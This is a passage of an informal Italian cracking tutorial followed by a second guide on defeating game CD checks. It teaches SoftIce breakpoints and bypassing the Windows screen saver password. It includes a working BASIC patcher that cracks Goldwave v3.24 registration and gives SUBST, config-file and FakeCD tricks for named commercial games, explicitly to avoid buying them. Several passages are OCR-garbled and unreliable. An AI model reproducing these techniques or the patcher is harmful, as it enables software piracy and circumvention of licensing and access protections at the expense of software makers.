MOV Dest. Source - Sposta un valore da Source a Dest. Per esempio MOV AL, 
BL - Sposta il contenuto di BL in AL. 


CMP varl1, var2 - Confronta i due valori di varl e var2. Per esempio CMP AL, 
BL - Confronta il contenuto di AL con quello in BL. Semplice no? Be'... 
questa istruzione funziona come una sottrazione: il valore in var2 viene 
sottratto da var1. Cioe', se ho 3 in AL, e 8 in BL, il risultato sarà' 

3-8 =-5. Il flag Carry (C) si attiverà' (questo flag si attiva ogni 

volta che il numero e' negativo). Nel 99,9% dei casi questo comando viene 
usato per confrontare la password da voi inserita e quella giusta, oppure 

come nell'esempio sopra, i giorni trascorsi, e quelli trascorribili (ma 

esiste questa parola?). 


JMP label - Questa e' l'istruzione piu' bella. Esegue un salto all'indirizzo 
specificato. Lo troverete, di solito dopo un CMP. Ci sono diverse 
variazioni di questo comando, che ora vi elencherò', e vanno tutte a 
controllare i flag Z, O, S, C e P. Nella sua forma più' semplice e' JMP 
label, cioè', salta a label qualsiasi siano i valori dei flag. Ponendo 

il comando CMP AX, BX, abbiamo: 


JNZ - Jump if not zero, AX diverso da BX 

JZ - Jump if zero, AX uguale a BX 

JB - Jump if below, AX < BX, C=1 

JA - Jump if above, AX > BX, C= 0 

JNGE - Jump if not greater or equal, AX<=BX, S diverso da 0 
JGE - Jump if greater or equal, AX=>BX, S = 0 

JLE - Jump if less or equal, AX<=BX, Z=1 o S=F 


Che palle! Vabbe'... cen'e' altri di 'sti' JMP, ma non credo che vi servano per 
i vostri loschi scopi, quindi non preoccupatevi... anche se non li sapete non 
cambia un cazzo. Comunque, se proprio vi interessano li trovate in un 
qualsiasi manuale di Assembler in giro per Internet. 


CALL label - Richiama una routine che si trova all'indirizzo specificato con 
label. Per esempio CALL 1F3D, esegue la routine a CS:1F3D. Poi, 
eseguendo la routine, quando trova un'istruzione RET torna 

all'istruzione dopo CALL. Facile no? Di solito, quelle chiamate 

con CALL sono delle routine che controllano il testo da voi 

inserito, oppure criptano la password che avete inserito ecc. 


INT n - Esegue un'interruzione. Un'interruzione e' come una routine, pero' non 
e' nel programma, ma da qualche parte nel DOS, o nel BIOS, dipende dalla 

n. Per esempio quei giochini vecchissimi che chiedevano il KeyDisk 

inserito usavano l'int 13 per vedere se c'era il dischetto inserito o no 

ecc. Comunque cazzate... in Windows gli INT non esistono quasi piu'. 


That's it. Questi sono i comandi principali dell'asm. Spero che gli abbiate 
capiti, perche' senza questi poi non ci capirete una minchia nel SoftIce. 
Anzi... se volete approfondire, c'e' il Assembly language foundamentals 
tutorial che aspetta solo di essere letto e studiato. I comandi che vi ho 
dato qui sono pure pochi, ma comunque quelli piu' importanti. 


3. L'uso del debugger 
Ok. Aspettate un'attimo che mi accendo una cicca... fumo troppo... ma vabbo'. 


Per spiegarvi come funziona il SoftIce vi traduco semplicemente le parti piu' 
importanti della guida che trovate anche compattata nel file SoftIce.zip. 
Cosi' risparmio la fatica di pensare ai comandi. 

Allora... intanto i consiglio di mettere una robe del genere alla fine del 
vostro Autoexec.bat: 


choice /tn,2 Caricare softice? 

if errorlevel 2 goto win 

c:\softice\winice (qui' mettete la righa che vi aggiunge il SoftIce nell'installazione) 
goto end 


‘win 

choice /ts,1 Caricare windows? 
if errorlevel 2 goto end 

win 


‘end 
Ed ora passiamo ai comandi principali del SoftIce: 


3.1 I comandi del SoftIce 

E' impossibile debuggare bene senza sapere come funzionano i BreakPoints (Bp). 
Un bp e' un'istruzione per la cpu che le dice di fermare l'esecuzione del 
programma dopo un accesso ad una certa locazione di memoria, oppure dopo 
certi eventi del programma stesso e da' il controllo al debugger. Quando setti 

un bp del SoftlIce e poi torni al programma che stai usando, SoftIce compare 
automaticamente quando la condizione per la quale e' settato il bp e' 

verificata. 


3.1.2 BreakPoint 
Bc # : Clear Breakpoint--elimina un breakpoint messo in precedenza nel 
Soft-Ice; devi sapere il numero del bp... 


Bd # : Disable Breakpoint--disabilita il bp ma non lo cancella; devi sapere 
il numero del bp... 


Be # : Enable Breakpoint--abilita il bp che hai disabilitato in precedenza; 
devi sapere il numero del bp... 


BI : List Breakpoints--mostra una lista di tutti i bp settati nel softice, 
il loro stato (abilitato, disabilitato), e il loro numero. 


Bmsg : Break on Windows Message. Sintassi: BMSG window handle L begin-message 
end-message 


Bpint : Break on Interrupt. Funziona solo con le interruzioni trattate da IDT 
(95/NT). Sintassi: BPINT int-number 


Bpio: Si ferma quando c'e' un accesso in lettura o scrittura ad una porta I/O 
con un certo indirizzio. Sintassi: BPIO port [R|[W|]RW] [EQ|JNE|GT|LT]M 
value] [c=count] 


Bpm: Si ferma quando c'e' un accesso alla memoria in lettura (read), scrittura 
(write), o esecuzione (execution). Sintassi: BPM[B[W]DWI] address 
[R]W]RW]X] 


Bpx : Break on execution. Sintassi: BPX address/symbol [c=count] 
[EQ|NE|GT]LT|M value] [c=count] 


Bpr : Break on memory range. Sintassi: BPR start-address end-address 
[R]W]RW]T|TW] [expression] 


Bprw : Break on program/code segment. Sintassi: BPRW module-name|selector 
[R[W]RW]T|TWI] [expression] 


3.1.2 Steppare attraverso il programma 

Debuggare in se' vuol dire eseguite una istruzione alla volta di un programma 
in modo da poter vedere come cambiano la memoria, i registri, i flags e le 
variabili. I principali comandi per farlo sono: 


P : Esegue una istruzzione e vede le CALL come una istruzzone sola. Shortcut: 
il tasto F10. 


P RET : Esegue il programma finche non trova un'istruzione RET. Shortcut: il 
tasto F12. 


T : Esegue una istruzzione. Shortcut: il tasto F8. 


3.1.3 Visualizzare informazioni sul sistema 
Addr : Visualizza o cambia ad un contesto di indirizzi. 


Class : Visualizza informazioni sui Windows Classes. 
CPU : Visualizza i registri della CPU. 

Exp : Carica/Visualizza i simboli esportati da un DLL. 
GDT : Visualizza la Global Descriptor Table. 

Heap : Visualizza i Global Heap di Windows. 

Heap32 : Visualizza/attraversa i Global Heap di Windows. 
HWND : Visualizza informazioni sui Windows Handles. 


IDT : Visualizza la Interrupt Descriptor Table. 


LDT : Visualizza la Local Descriptor Table. 
LHeap : Visualizza i Windows Local Heap. 


Map32 : Visualizza una mappa di memoria di tutti i moduli a 32bit caricati 
in memoria. 


MapV86 : Visualizza la mappa di memoria DOS memory della macchina virtuale 
corrente. 


Mod : Mostra la Windows Module List. 

Page : Mostra le Page Table information. 

Proc : Visualizza informazioni su un processo. 

Stack : Visualizza una call stack. 

Sym : Imposta o visualizza un Symbol. 

Task : Mostra Windows Task List. 

VCall : Mostra i nome e indirizzi di una routine VxD chiamabile con CALL. 
VM : Visualizza informazioni sulle macchine virtuali. 

VXD : Visualizza la mappa Windows VXD. 

.VMM : Chiama il VMM Debug Informational Services menu. 
.VPICD : Chiama il VPICD Debug Information Menu. 
.VXDLDR : Mostra informazioni VXD. 

WMSG : Visualizza i nomi e numeri dei messaggi Windows. 


Inoltre, cosa molto importante, che stavo quasi per dimenticarmi, c'e' da dire 
che nel SoftIce ci entrate con CTRL-D. Figo, no? 


4. Iniziamo a crackare 

Benebenebene... adesso che vi siete sorbiti tutte le cazzate qui sopra citate, 
sapete come funziona il SoftIce e anche un po' di asm, contenti? Ok. Possiamo 
iniziare con una cosa molto semplice e anche abbastanza inutile: la password 
dello Screen Saver di Windows. E' l'unica cosa che penso abbiano tutti nel 
loro Windows, cosi' evitate di andare a scaricare prog. che magari neanche 
volete, solo per provare ad crackarlo. Ok? Sono un bravo ragazzo o no? 
Iniziamo. Caricate il SoftIce, andate nel pannello di controllo, sceglietevi 


uno screen saver e impostate una password... una a caso, tanto ora la rendiamo 
inutile. Aspettate che lo SS (polizia militare tedesca) entri in funzione, 

inserite una pw sbagliata e entrate nel Softice con CTRL-D. Ok. Ora siamo nel 
Debugger. Adesso c'e' un problema... dobbiamo intercettare una funzione di 
Windows. Cioe' quella che legga il testo da noi inserito nella casella di 

testo della pw. Per fare questo innanzitutto dobbiamo sapere in che programma 
e' la finestrella con la casella di testo interessata. Digitiamo TASK e il 

SoftIce ci da una lista di programmi al momento attivi. Uno di questi e' (nel 
mio caso) "oggetti volanti". Io ho scelto questo ss, ma immagino che il 

vostro sia un'altro. Comunque, se non siete proprio cretini, nella lista di 

prog. che vi da, troverete quello dello ss. Fatto questo, c'e' da fare una 

piccola nota sul funzionamento di Windows. Qualsiasi cosa vedete sullo 
schermo (un pulsante di Ok, la X nella parte destra-alta delle finestrelle di 

Win, una casella di testo, ...) e' un handle di Windows. Sono chiamati cosi'. 

La casella di testo nella quale noi abbiamo inserito la pw e' un handle. Nel 
SoftIce e' possibile visualizzare tutti gli handle attivi al momento con il 
comando HWND. Digitandolo, vedrete una lista di tutti gli hwnd attivi di 

tutti i programmi. Di ogni hwnd il SoftIce da informazioni sull'numero del 
hwnd, il programma nel quale si trova e il suo nome. Noi siamo a caccia di 

un hwnd chiamato EDIT, visto che e' una casella di testo. Nella lista 

troverete proprio l'edit che vi serve (il prog. "Oggetti Volanti" ne 

visualizza uno solo). 

Ora dobbiamo solo intercettare la funzione di Windows che legge il testo 
contenuto in quella casella e ci ritroveremo esattamente nella routine da 

fottere. Per fare questo settiamo un bp con il seguente comando: BMSG num_hwnd 
WM_GETTEXT per num_hwnd, ovviamente, dovrete inserire il numero del handle che 
vi da SoftIce (il primo a sinistra). WM_GETTEXT invece e' un messaggio di 
Windows che legge un testo da una casella di testo. 

Dopo che avete inserito il comando nella righa di comando del SoftIce, date 
l'invio e tornate allo Screen Saver con CTRL-D. Cliccate su Ok per confermare 
la vostra pw sbagliata e... magia! Riappare il SoftIce e vi trovate nella 

routine BOZOSLIVEHERE (un piccolo scherzo della MicroSoft, credo... cretini...) 
di USER. Pero', come potete vedere nella parte bassa della finestra del codice, 
non siamo nel programma da noi desiderato (quello dello Screen Saver) ma in 
USER, del quale non ce ne frega un cazzo, e quindi steppiamo attraverso il 
codice, premendo F12, fino ad arrivare a Kernel.Alloc. Ogni volta che 

arrivate a Kernel.Alloc, sappiate che dopo il prossimon F12 che premete siete 
nel vostro programma. Premiamo un'altra volta l'F12 e ci troviamo nel bel 
mezzo di PASSWORD! .text. Cosi' ora sappiamo anche che lo Screen Saver usa 
l'estensione del Pannello di Controllo PASSWORD.CPL per gestire le password. 
Iniziate gia' un po' a sentirvi dei fighi? Andiamo avanti. Guardatevi bene il 
codice: 


0137:7C45428F CALL [7C4582BC] ................. La call dalla quale 
siamo appena usciti 


0137:7C454295 TEST EDI, EDI............ n Controlla cosa 
c'e' in EDI 


0137:7C454297 INZ 7C4542B1........... n Un JMP condizionale 
0137:7C454299 LEA EAX, [EBP-04] 

0137:7C45429C LEA ECX, [EBP-14] 

0137:7C45429F PUSH EAX 


0137:7C4542A0 PUSH ECX 


0137:7C4542A1 CALL 7C454536 ......uiiireeeeeeeeeeeee Chiama una Routine 
0137:7C4542A6 TEST EAX, EAX_.... Controlla cosa 

c'e' in EAX 

0137:7C4542A8 JZ 7C4542DE .... ii Un'altro JMP 
condizionale 


0137:7C4542AA MOV EA X,00000001 


0137:7C4542AF JMP 7C454322 .......u ricer ieeeeeeee Con questo JMPi 
sicuramente... 


Ok... Ci sono due CALL, e subito dopo le rispettive CALL, i rispettivi JMP. 
A me viene da pensare (a me perche' di programmi ne ho visti tanti...) che una 
controlla la lunghezza della pw e l'altra i caratteri. Ma ovviamente questo 

non si puo' sapere... e' solo un'intuizione che viene dopo kili di programmi 
sorbiti con il passare degli anni. Ma tanto a noi non ci frega di cosa fanno 

le call. Steppando attraverso il codice vediamo che almeno uno dei due jump 
ci fa saltare, quindi probabilmente, la parte del programma che ci rida' 
accesso al Desktop si trova all'indirizzo 0137:7C4542AF (l'ultimo JMP). 
Quindi, arrivati al primo JMP (JNZ 7C4542B1) noi non vogliamo saltare: 
premiamo F10 fino a quell'istruzione e mettiamo il flag Z a 0. Andiamo avanti 
con F10 fino al secondo JMP (JZ 7C4542DE) e settiamo il flag Z a 1 per non 
saltare neanche questa volta. Ok. Fatto. Ora possiamo tornare al programma 
premendo CTRL-D. Lo Screen Saver e' sparito e noi abbiamo riguadagnato 
l'accesso all'Desktop anche se abbiamo inserito la pw sbagliata. 

Dite la verita'. Vi sentite dei grandi ora o mi sbaglio? 


Ora forse non avrete capito perfettamente tutto quello che c'e' scritto qui' 

sopra, ma vi assicuro che se seguite i passi nell'esempio, piano piano 

capirete come fare a crackare anche altri programmi. Ora vi chiederete: 

"cosa sara' mai quel WM_GETTEXT???". E' un message brake di Windows. Nel senso 
che c'e' una parte in Windows che usa questo simbolo per leggere il testo da 

voi inserito nella casella di testo. Comunque ora ve ne do anche altri, per i 

pulsanti di Ok e altre cose. 


5. BreakPoints utili 

Per prima cosa, per poter usare i seguenti bp (MM_GETTEXT compreso) dovete 
editare il file WINICE.DAT nella directory di SoftIce e includere gli exports 

di 

gdi32.dll 

kernel32.dll 

user32.d]l 

questi tre per ora dovrebbero bastare, comunque sappiate che potete aggiungere 
anche gli altri dll e exe che vi interessano. 

I bp che seguono sono tutti da settare con Bpx nel SoftIce. 

5.1 Lettura e scrittura sui file 

Questi che seguono sono gli API calls di Windows piu' comuni. 

Sono CALL generiche di accesso a file (di solito in binario) in lettura e 
scrittura. 

ReadFile 

WriteFile 

L'accesso ai file avviene con le seguenti routine 

SetFilePointer 

GetSytemDirectory 

GetSytemDirectoryA 


Per leggere e scrivere sui file INI le CALL da intercettare sono le seguenti: 
per applicazioni a 16bit 


GetPrivateProfileString 
GetPrivatProfileInt 
WritePrivateProfileString 
WritePrivatProfileInt 

per applicazioni a 32bit 
GetPrivateProfileStringA 
GetPrivatProfileIntA 


WritePrivateProfileStringA 


WritePrivatProfileIntA 


5.2 Interrupt 
Accesso ad un file 


bpint 21 - con ah = 3d 

bpint 2f - con ah = 01 

5.3 Il Registry 

Crea o elimina una key nel registry (quelle con A alla fine sono per 
applicazioni a 32 bit) 

RegCreateKey 

RegDeleteKey 

RegCreateKeyA 

RegDeleteKeyA 

Leggi un valore da una Key correntemente aperta nel registry 
RegQuery Value 

RegQueryValueA 

Apre o chiude una Key nel registry 

RegCloseKey 

RegOpenKey 

RegCloseKeyA 

RegOpenKeyA 

5.4 Finestre di dialogo 

Legge testo o un numero da una finestra di dialogo edit (quelle con A alla 
fine sono per applicazioni a 32 bit) 

GetWindowText 


GetDlgItemText 


GetWindowTextA 


GetDlgItemTextA 

GetDlgItemInt 

Quando si apre una finestrella di messaggio, di solito una di quelle che dice 
"registrazione non valida" o qualcosa del genere, dovete intercettare queste 
CALLs 

MessageBox 


MessageBoxA 


MessageBoxExA 


MessageBeep 

5.5 Data e ora 

Queste sono particolarmente utili per i programmi che non funzionano piu' dopo 
un paio di giorni 
GetSystemTime 
GetLocalTime 
SytemTimeToFileTime 

5.6 Creazione di una finestra 
CreateWindow 
CreateWindowExA 
ShowWindow 


bitblt (e' una roba simile a himemcpy... sposta e muove memoria in giro) 


5.7 CD-ROM 
Molto utili per i check del CD-ROM. 


GetDriveType (se EA X e' 5, allora e' un CD-ROM check) 
GetDriveTypeA (per le app. a 32 bit) 


Eseguite le CALL, in EAX c'e' un valore, ed e' da interpretare nel seguente 
modo: 


[I PSEREECE Drive cannot be determinated 


distratta root dir does not exist 


Tinga DriveRemoveable 
RAI A fixed disk (HD) 
da Remote drive (NetWork) 
Sali Cd-Rom drive 

[8 CRAFREICOE RamDisk 

5.8 Altri BreakPoints 


Questi li potete usare quando il resto non funziona... sono dei bp, che, in 
generale, funzionano 


BozosLiveHere (ve lo ricordate?) 


HMemCpy (quello citato sopra. sposta variabili, di solito stringhe, in giro 
per la memoria) 


GlobalGetAtomName 


5.8 I messaggi 
Questi sono da settare con BMSG nel SoftIce (non con BPX). 


WM_GETTEXT (un handle di testo) 
WM_COMMAND (quando premi un pulsante di Ok) 


Penso che sappiate come usarli questi... ve lo ho spiegato sopra... comunque 
lo ripeto: 


BMSG hwnd_num WM_COMMAND, per esempio. Per hwnd_num, ovviamente, dovete 
inserire il numero dell'handle trovato con il comando HWND del SoftiIce. 


Questi sono i bp piu' utili che potete settare. Non dovete impararli a 
memoria... dopo un po' li saprete per i cazzi vostri. Ma sarebbe bene che ve 
li leggiate, cosi' sapete che esistono e sapete che potete usarli quando vi 
servono. 


6. Il patch 

Cos'e' un patch? Semplicemente un programma che faccia da solo il cracking di 
un prog. Nel esempio dello Screen Saver per esempio, il programma deve 
cambiare in NOP (No operation) i due jump condizionali. Il risultato finale 
sara': 


0137:7C45428F CALL [7C4582BC] ......................... La call dalla quale 


siamo appena usciti 


0137:7C454295 TEST EDI, EDI............ n Controlla cosa 
c'e' in EDI 
0137:70454297 NOP. Niente piu' jmp condizionale, ma 


un nop (non dobbiamo saltare). 

0137:7C454298 NOP ...................... I NOP sono due perche' i byte che 
occupa l'istruzione che c'era prima 

erano il doppio di un NOP 

0137:7C454299 LEA EAX, [EBP-04] 

0137:7C45429C LEA ECX, [EBP-14] 

0137:7C45429F PUSH EAX 


0137:7C4542A0 PUSH ECX 


0137:7C4542A1 CALL 7C454536 Lr Chiama una Routine 
0137:7C4542A6 TEST EAX, EAX_.... Controlla cosa 

c'e' in EAX 

0137:7C4542A8 NOP... irrrereeeereneene Stesso discorso 

di sopra 


0137:7C4542A9 NOP 
0137:7C4542AA MOV EA X,00000001 


0137:7C4542AF JMP 7C454322 ........... Il jmp che ci fa saltare alla 
routine di sbloccaggio 


Questo e' il programma come dovrebbe essere dopo il crack, quando lo 
disassemblate. Chiaro? Ora... per cambiare il jmp con un NOP, non dobbiamo 
fare altro che prendere nota dei byte originai, cioe' quelli con i jmp come 
erano all'inizio, poi cambiarli con i nop, e prendere nota del cambiamento 
dei byte. Per vedere l'istruzione disassemblata, in SoftIce, si usa il 

comando CODE ON, che vicino ad ogni istruzione, vi mostra i byte che le 
rappresentano. Facile no? Ho scritto, solo per voi, un patch universale in 
Basic (linguaggio del cazzo ma veloce, intuitivo, e soprattutto facile, per 

voi che non ci capite una sega) che vi riporto qui sotto, cosi' lo compilate 
diversamente ogni volta che crackate un programma. Per usarlo dovete 
conoscere l'offset dei byte da cambiare, che potete trovare con un Hex editor, 
i byte del file originale e quelli dopo il crackaggio. Ok. In oltre vi sarei 
molto grato se lasciaste le righe in cui ci sono i crediti (52)... o se 


proprio non volete, almeno mettete un "tnx to S2" o qualcosa del genere... 
vene sarei grati. Let's patch! 


---VARIABLE DEFINITIONS--- 


---File Name of the file to crack--- 

FileName$ = "GOLDWAVE.EXE" 

---Number of bytes to change--- 

NBC = 6 

'---15, 133, 156... are the original bytes of the file (in decimal!!!)--- 

OB$ = CHR$(15) + CHR$(133) + CHR$(156) + CHR$(0) + CHR$(0) + CHR$(0) 
'---233, 157, 0... are the changed bytes of the file (in decimal!!!)--- 

CB$ = CHR$(233) + CHR$(157) + CHR$(0) + CHR$(0) + CHR$(0) + CHR$(144) 
'---The offset where the bytes to change are--- 

‘---you can find 'em with a Hex editor--- 

---the first byte of the file is 1--- 

OS = 147393 

'---The file size in bytes--- 

FS = 946176 


---CREDIZ & INFO--- 

CLS 

PRINT "Patch for Goldwave v3.24 written by S2" 
PRINT "" 

PRINT "This Patch allows you to enter ANY password" 
PRINT "you like, and the program will register" 
PRINT "itselve." 

PRINT "If the file is already patched, it will return" 
PRINT "to it's original state." 

PRINT "Have fun!" 

PRINT "" 

DO: LOOP WHILE INKEY$ = """ 


---FILE CHECK & VERSION CHECK--- 
PRINT "Opening file "; FileName$; "..." 
PRINT "" 

ON ERROR GOTO OpenFileErr 

OPEN FileName$ FOR INPUT AS #1 

IF NOT LOF(1) = FS THEN 

PRINT "The file has not the right size." 
PRINT "Check if it is the correct version." 
PRINT "" 

END 

END IF 


CLOSE #1 


ON ERROR GOTO 0 


---FILE PATCH & UNPATCH.--- 

ON ERROR GOTO PatchFileErr 

OPEN FileName$ FOR BINARY ACCESS READ WRITE AS #1 
PRINT "Checking file..." 

PRINT "" 


Data$ = STRING$(NBC, " ") 
GET #1, OS, Data$ 


IF Data$ = CB$ THEN 

PRINT "File already patched." 
PRINT "Back to it's original state..." 
PRINT "" 

PUT #1, OS, OB$ 

PRINT "Now the file is unpatched!" 
ELSE 
PRINT "File not patched." 

PRINT "Let's patch..." 

PRINT "" 

PUT #1, OS, CB$ 

PRINT "Now the file is patched!" 
PRINT "Registration for FREE now!" 


END IF 


END 


OpenFileErr: 

PRINT "There was an error while opening the file." 
PRINT "run-time errorcode "; ERR 

PRINT "" 

END 


PatchFileErr: 

PRINT "There was an error while patching the file. 
PRINT "run-time errorcode "; ERR 

PRINT "" 

END 


Ho scritto i commenti in inglese per mettere il programma in Internet, ma 
comunque non penso che ci voglia tanto a capire come funziona. 

Quando volete creare un patch per un altro file, tutto quello che dovete 
modificare e' contenuto nelle variabili all'inizio del programma. Li rielenco 
in italiano con alcuni commenti per farvi capire meglio: 


FileName$ = "GOLDWAVE.EXE" 
In questo punto, al posto di GOLDWAVE.EXE inserite il nome del file da 
crackare. 


NBC = 6 
6 e' il numero di byte da modificare. In questo caso 6. 


OB$ = CHR$(15) + CHR$(133) + CHR$(156) + CHR$(0) + CHR$(0) + CHR$(0) 
AI posto di 15, 133, 156... dovete inserire i byte originali del file che 

volete crackare. 

Se i byte sono di piu' o di meno di 6, semplicemente aggiungete o togliete 

i CHR$() che sono in meno o di troppo. 


CB$ = CHR$(233) + CHR$(157) + CHR$(0) + CHR$(0) + CHR$(0) + CHR$(144) 
Stesso discorso di sopra, solamente, questa volta, i byte inseriti tra le 
parentesi sono quelli che volete siano scritti. 


OS = 147393 

L'offset dei byte da cambiare. Come trovarlo? Se come Hex editor usate 
l'Hexworks, per esempio, tutto quello che dovete fare e' andare a ricercare 
(nel Hexworks, ovviamente) dove si trovano i byte che volete modificare. 
Trovati quelli, sulla sinistra (o sulla barra di stato) troverete scritto 

l'offset dei byte. Attenzione pero"! In Hexworks, il primo byte nel file e' 0, 
mentre secondo il Basic, il primo byte nel file e' 1. Quindi, all'offset che 
troverete in Hexworks dovrete aggiungere 1. Abbastanza ovvio, no? 


FS = 946176 
E' la grandezza del file in byte. Se non sapete come trovare questa da soli 
siete degli incompetenti, e aggiungerei anche imbecilli :-)))) 


Notate che se volete fare un patch per la password dello screen saver, 

dovrete cambiare un po' il codice, perche' i byte da cambiare non sono in fila, 
ma iniziano a due indirizzi diversi, quindi due offset diversi. Per cui, ci 

sara' da aggiungere una variabile OS1$, per il secondo offset, 0B1$, per i 
byte originali nella seconda posizione e CB1$, per i byte cambiati nella 
seconda posizione. E poi dovrete aggiungere il codice per il cambiamento dei 
byte nella seconda posizione (al secondo offset). Chiaro no? No? Studiate il 
basic, o scrivete il patch in un linguaggio che conoscete. 


E questo e' quanto. 


7. Conclusione 

Bene raga. Ho finito. Penso che di tutta sta roba, se non sapevate veramente 
un cazzo, abbiate capito molto poco, ma non vi preoccupate... se provate a 
mettere in pratica ci riuscirete piano piano a crackare il vostro primo 
shareware da soli... ci vuole solo un po' di esperienza... Da parte mia ho 
cercato di darvi tutte le informazioni piu' utili che ho potuto trovare in 


Internet, e di spiegarmi in maniera piu' o meno capibile. Spero che questo 
manualetto vi serva e che vi ricordiate di S2 in futuro... Inoltre vorrei 
ringraziare extasy- per avermi dato l'idea, anche se in modo implicito, di 
scrivere una roba del genere... E ringraziamenti vanno anche alla fabbrichetta 
di Plastica nella quale ho lavorato, per le sigarette che grazie a loro posso 
permettermi. 


Mini guida per sproteggere i giochi dedicata a chi di cracking non ne sa 
nulla ;-) 


Questa guida così come è scritto nel titolo è dedicata a chi di cracking non ne capisce nulla ma ha la 
necessità di sproteggere un gioco senza impazzirsi con programmi come softice e simili. 

Con i consigli che troverete qui di seguito riuscirete a sproteggere solo una piccola parte dei giochi che 
trovate in commercio (diciamo un 20%?) ma mi sembra meglio di niente no? Allora perchè abbiamo la 
necessità di sproteggere un gioco? 

Forse perchè non ci va di comprarlo originale o perchè non abbiamo un masterizzatore per 
poter fare la copia fisica? Quante volte ci è capitato che un nostro amico ci ha prestato un 
gioco originale che ha appena comprato e non non siamo riusciti a farlo funzionare perchè 
pur copiando l'intero CD su hard disk una volta lanciato l'eseguibile mi usciva sempre fuori la 
famosa scritta "inserire il cd nel lettore". 

Gli scopi di questa guida sono: 

- elencare una serie di sistemi che permettono di saltare il cd-check (presenza del cd originale 
all'interno del lettore) 

- dare qualche consiglio su come far okkupare ai giochi il minor spazio possibile una volta che sono 
stati copiati su HD 

- come utilizzare il game wizard per craccare i giochi (scritto da CAVALLO) 

Ripeto questi sistemi funzionano solo a volte e in pochi casi ma vi assicuro che prima che anche io 
cominciassi ad usare softice e prima di comprarmi il masterizzatore li usavo spesso e qualche volte con 
una buona dose di culo e intuito riuscivo a sproteggere il gioco. 


PARTE 1: VARI SISTEMI PER "SALTARE IL CD-CHECK" 


Nota: è sottointeso che per far funzionare questi metodi io debba copiare l'intero cd o sua parte (vedi 
Parte 2) sull'HD. Solo in alcuni casi l'installazione max da parte del gioco è sufficiente quindi consiglio 
sempre di fare un raffronto tra installazione max e contenuto reale del cd. Molte volte alcuni file 
necessari pur facendo l'installazione massima vengono lasciati sul cd. Quindi controllate gente 
controllate! 


1) METODO INFALLIBILE: 


Copiate il gioco su HD, accedete a internet andate in giro per il web o per qualche canale di iRC e 
vedete se qualcuno ha già provveduto per voi. Nel caso riusciate in ciò il gioco riuscirete a sproteggerlo 
al 100%. ;-) 

Dai su stavo solo scherzando... ora inizio a scrivere qualcosa di serio e di utile, comunque se non 
riuscite a sproteggere il gioco con nessuno dei sistemi sotto elencati provate a cercare il crack sulla rete 
o cominciate a studiare seriamente l'arte del cracking. un buon punto di partenza in lingua italiana è la 
famosa: The Xoanon's Guide to Cracking ( by Xoanon ). 

Detto questo iniziamo seriamente o quasi ;-) . 


2) CD-CHECK BASATI SULLA LABEL CD: 


Ci sono alcuni giochi che per verificare la presenza del cd nel lettore usano la label del cd. 
Quindi per questo tipo di giochi (non ne ho incontrati molti) basta rinominare il proprio HD con la 
stessa label del cd e usare successivamente il famoso comando subst. 


Il subst è un comando del dos che permette di creare delle unità virtuali, in questo caso il gioco vede 
queste unità virtuali come un cd-rom, vediamo come funziona: 


SUBST [unità1: [unità2:]percorso] 
SUBST unità1: /D 


unitàl: Specifica l'unità virtuale da assegnare al percorso di ricerca. 
[unità2:]percorso Specifica l'unità fisica ed il percorso da assegnare all'unità virtuale. 
ID Elimina l'unità virtuale specificata. 


Digitare SUBST senza parametri per visualizzare l'elenco delle unità virtuali esistenti. 


Un gioco che utilizza questo tipo di protezione è il bellissimo MDK, per sproteggerlo non dovete far 
altro che copiare il cd su HD in una dir c:\mdk ad esempio (attenzione che nel cd originale ci sono 200 
mega di demo perfettamente inutili (se usate l'install scegliete l'installazione massima, okkupa circa 
100MB). Una volat fatto ciò rinominate l'hd con la label del cd di Mdk (MDK) 

e successivamente usate il comando subst. Nel nostro caso dovremmo scrivere subst x: c:\mdk dove x: 
è una lettera libera. 

Nel caso incontriate giochi basati su questo tipo di protezioni vi consiglio di farvi un bel file .bat. che 
rinomini automaticamente la label. 


3) CD-CHECK CHE SI FREGANO CON IL SUBST: 


Non ci crederete ma si riescono a eliminare più cd check con il comando subst del Dos che abbiamo 
esaminato sopra che con altri programmi simili che esamineremo in seguito. Volete subito qualche 
nome? Tra quelli che mi ricordo vi potrei citare The Dig e Roland Garros 97. Esamineremo il secondo 
gioco in quanto più recente. 

Installate normalmente Roland Garros (45MB) da CD (magari vi consiglio di usare per il CD in questo 
caso una lettera che non vi serve tipo G:, per fare ciò usate gestione periferiche). Una volta installato in 
c:\rg97 ad esempio scrivete subst x: c:\rg97 dove x: è la lettera del drive da dove avete installato il 
gioco (per questo motivo sopra vi avevo detto di usare una lettera in cui normalmente non avete 
nessuna periferica associata). La lettera del cdrom si cambia facilmente da gestione periferiche di 
windows95. 


4) CD-CHECK BASATI SUI FILE DI CONFIGURAZIONE O DI SETUP: 


A volte alcuni giochi quando vengono installati creano generalmente nella directory principale di 
instalalzione dei file con estensione .cfg o dei file setup.xxx (xxx è l'estensione). Io vi consiglio di dare 
sempre uno sguardo con il comune edit del Dos a questi file. Perchè fare ciò? 

Semplice a volte all'interno di questi file troviamo diciture tipo: 

cdpath= d:\ 

o) 

cd= d:\ 


Tutto quello che dobbiamo fare è cambiare queste diciture con altre di nostro comodo tipo: 
cdpatch= c:\gioco1 

o) 

cd= c:\gioco1 


Dove gioco1 è ad esempio la directory in cui noi abbiamo copiato il gioco. 


Anche in questo caso facciamo un paio di esempi. Giochi che usano questo tipo di protezione sono ad 
esempio Theme Hospital e PowerF1. Nella dir principale dei giochi in questione troviamo un file .cfg. 
Diamoci un occhiata con l'edit del dos e subito noteremo che compare la lettera d:\ identificativa del 
CD. Bene sostituiamola con il path della dir in cui noi abbiamo installato il 

gioco e in questo modo il cd-check è superato. 


5) CD-CHECK CHE SI FREGANO USANDO PROGRAMMI TIPO 
FAKECD O 0CD 


Indispensabili per questo tipo di sprotezione è il possesso dei due programmi sopracitati, ce ne sono 
anche degli altri simili ma io vi consiglio questi due perchè sono quelli che mi hanno dato più 
soddisfazioni. Usarli è semplicissimo e di solito vanno abbinati al comando subst che abbiamo 
esaminato precedentemente. 

Questi due programmi permettono di emulare il Cd in maniera abbastanza buona ma solo in alcuni casi 
quindi non ci fate troppo affidamento non è tutto oro quello che luccica (cazzo ma sono un poeta!). Per 
l'uso di questi programmi io consiglio di: 

- usarli sotto dos (non il prompt) 

- non aver il driver mscdex installato (il cd-rom) 

- di usarli abbinati al comando subst 

Quindi in questo caso non mi dilungherò in spiegazioni ma passo direttamente ad un'esempio. 

Nel primo Tomb Raider (il primo non so il secondo!) il cd check viene facilmente saltato usando OCD 
e il comando subst abbinati. Naturalmente il comando subst lo uso sulla "stessa lettera" in cui io ho 
usato il fake cd o lo 0cd. 

